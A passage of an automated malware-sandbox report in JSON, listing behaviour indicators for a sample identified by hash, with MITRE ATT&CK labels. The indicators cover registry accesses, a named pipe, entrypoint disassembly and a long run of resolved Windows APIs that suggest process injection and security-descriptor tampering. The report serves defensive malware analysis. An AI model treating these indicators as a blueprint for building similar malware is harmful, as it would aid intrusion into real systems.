\"HKCU\\CLSID\\{26EE0668-A00A-44D7-9371-BEB064C98683}\\SHELLFOLDER\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" touched \"UsersLibraries\" (Path: \"HKCU\\CLSID\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\\SHELLFOLDER\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" touched \"CLSID_SearchFolder\" (Path: \"HKCU\\CLSID\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\\SHELLFOLDER\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" touched \"Microsoft OneNote Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\\SHELLFOLDER\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" touched \"IE History and Feeds Shell Data Source for Windows Search\" (Path: \"HKCU\\CLSID\\{11016101-E366-4D22-BC06-4ADA335C892B}\\SHELLFOLDER\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" touched \"@C:\\Program Files (x86)\\Microsoft Office\\Office15\\MAPISHELL.DLL,-110\" (Path: \"HKCU\\CLSID\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\\SHELLFOLDER\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" touched \"Public Folder\" (Path: \"HKCU\\CLSID\\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\\SHELLFOLDER\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" touched \"Control Panel command object for Start menu and desktop\" (Path: \"HKCU\\CLSID\\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\\SHELLFOLDER\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-110\" (Path: \"HKCU\\CLSID\\{89D83576-6BD1-4C86-9454-BEB04E94C819}\\SHELLFOLDER\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" touched \"DXP\" (Path: \"HKCU\\CLSID\\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\\SHELLFOLDER\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" touched \"CLSID_SearchHome\" (Path: \"HKCU\\CLSID\\{9343812E-1C37-4A49-A12E-4B2D810D956B}\\SHELLFOLDER\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" touched \"Windows Search Service Media Center Namespace Extension Handler\" (Path: \"HKCU\\CLSID\\{98D99750-0B8A-4C59-9151-589053683D73}\\SHELLFOLDER\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" touched \"Other Users Folder\" (Path: \"HKCU\\CLSID\\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\\SHELLFOLDER\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-112\" (Path: \"HKCU\\CLSID\\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\\SHELLFOLDER\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" touched \"CLSID_StartMenuProviderFolder\" (Path: \"HKCU\\CLSID\\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\\SHELLFOLDER\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" touched \"CLSID_StartMenuPathCompleteProviderFolder\" (Path: \"HKCU\\CLSID\\{E345F35F-9397-435C-8F95-4E922C26259E}\\SHELLFOLDER\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" touched \"Games Explorer\" (Path: \"HKCU\\CLSID\\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\\SHELLFOLDER\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" touched \"Computers and Devices\" (Path: \"HKCU\\CLSID\\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\SHELLFOLDER\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" touched \"Sticky Notes Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\\SHELLFOLDER\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\")\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" touched \"Security Manager\" (Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 756C0000\n \"netsh.exe\" loaded module \"%WINDIR%\\System32\\bcryptprimitives.dll\" at 75280000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-138", "type": 6, "relevance": 3, "name": "Calls an API typically used to create an instance of a named pipe", "description": "\"svchost.exe\" called \"NtCreateNamedPipeFile\" with parameter \"pipe\\uqyipjlp\" - (UID: 00000000-00002572)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"mpvpepag.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"DISMHOST.EXE.67EE5469.bin\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"\n \"mpvpepag.exe\" file has an entrypoint instructions - \"call\t0x401930,jmp\t0x401416,push\tebp,mov\tebp, esp,push\t0,call\tdword ptr [0x40c034],push\tdword ptr [ebp + 8],call\tdword ptr [0x40c030],push\t0xc0000409,call\tdword ptr [0x40c00c],push\teax,call\tdword ptr [0x40c038],pop\tebp,ret\t,push\tebp,mov\tebp, esp,sub\tesp, 0x324,push\t0x17,call\t0x40a716,test\teax, eax,je\t0x4015c9,push\t2,pop\tecx,int\t0x29,mov\tdword ptr [0x4146b0], eax,mov\tdword ptr [0x4146ac], ecx,mov\tdword ptr [0x4146a8], edx,mov\tdword ptr [0x4146a4], ebx,\"\n \"DISMHOST.EXE.67EE5469.bin\" file has an entrypoint instructions - \"call\t0x100a7e6,jmp\t0x10097f4,int3\t,int3\t,int3\t,int3\t,int3\t,push\t0x14,push\t0x1010878,call\t0x1009d10,and\tdword ptr [ebp - 4], 0,dec\tdword ptr [ebp + 0x10],js\t0x1009afc,mov\tecx, dword ptr [ebp + 8],sub\tecx, dword ptr [ebp + 0xc],mov\tdword ptr [ebp + 8], ecx,call\tdword ptr [ebp + 0x14],jmp\t0x1009abc,mov\teax, dword ptr [ebp - 0x14],mov\tdword ptr [ebp - 0x1c], eax,mov\teax, dword ptr [ebp - 0x1c],mov\teax, dword ptr [eax],mov\tdword ptr [ebp - 0x20], eax,mov\teax, dword ptr [ebp - 0x20],cmp\tdword ptr [eax], 0xe06d7363,je\t0x1009af3,mov\tdword ptr [ebp - 0x24], 0,mov\teax, dword ptr [ebp - 0x24],ret\t,call\tdword ptr [0x1001210],mov\tesp, dword ptr [ebp - 0x18],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GlobalAlloc (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter Sleep (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter VirtualAlloc (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter CreateToolhelp32Snapshot (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter Module32First (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter VirtualProtect (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter VirtualFree (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GetVersionExA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter TerminateProcess (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter SetErrorMode (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter StackWalk64 (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GetVolumeInformationA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GetComputerNameA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GetTickCount (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GetModuleHandleA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter lstrlenA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter lstrcpynA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GetOverlappedResult (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter WaitForSingleObject (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter WriteFile (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter ReadFile (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter CreateFileA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter DisconnectNamedPipe (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter ConnectNamedPipe (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter CreateNamedPipeA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GetEnvironmentVariableA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter DeleteFileA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter IsBadWritePtr (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter IsBadCodePtr (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter lstrcpyA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter lstrcmpA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter IsBadReadPtr (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter WriteProcessMemory (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter VirtualAllocEx (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter SetFilePointer (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter SetFileAttributesA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GetWindowsDirectoryA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GetProcAddress (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesExA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter LocalAlloc (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter CreateProcessA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GetTempPathA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter SystemTimeToFileTime (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GetSystemTime (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter DeviceIoControl (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GetModuleFileNameA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter ResumeThread (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter SetThreadContext (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GetThreadContext (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter lstrcatA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GetDriveTypeA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GetCommandLineA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter SetUnhandledExceptionFilter (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter InterlockedIncrement (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GetTimeZoneInformation (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter FileTimeToLocalFileTime (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter InterlockedDecrement (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter HeapSize (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GetSystemTimeAsFileTime (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter MultiByteToWideChar (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoW (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GetProcessHeap (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter HeapAlloc (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter HeapReAlloc (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter HeapFree (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter CreateEventA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GetSystemDirectoryA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter wsprintfA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter CharToOemA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter ConvertSidToStringSidA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter AllocateAndInitializeSid (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter CreateProcessWithLogonW (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter StartServiceCtrlDispatcherA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter RegisterServiceCtrlHandlerA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter SetServiceStatus (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter RegGetKeySecurity (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter RegSetKeySecurity (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter RegSetValueExA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GetLengthSid (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GetFileSecurityA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorOwner (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter InitializeSecurityDescriptor (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorOwner (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter SetFileSecurityA (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GetSecurityDescriptorDacl (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter GetAce (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter DeleteAce (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter SetSecurityDescriptorDacl (UID: 00000000-00005780)\n \"6e13a1dcc528e5e5ad63a82c4b5054b94d4a95bbf357879a98effa32894931ab.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExA (UID: 00000000-00005780)\n 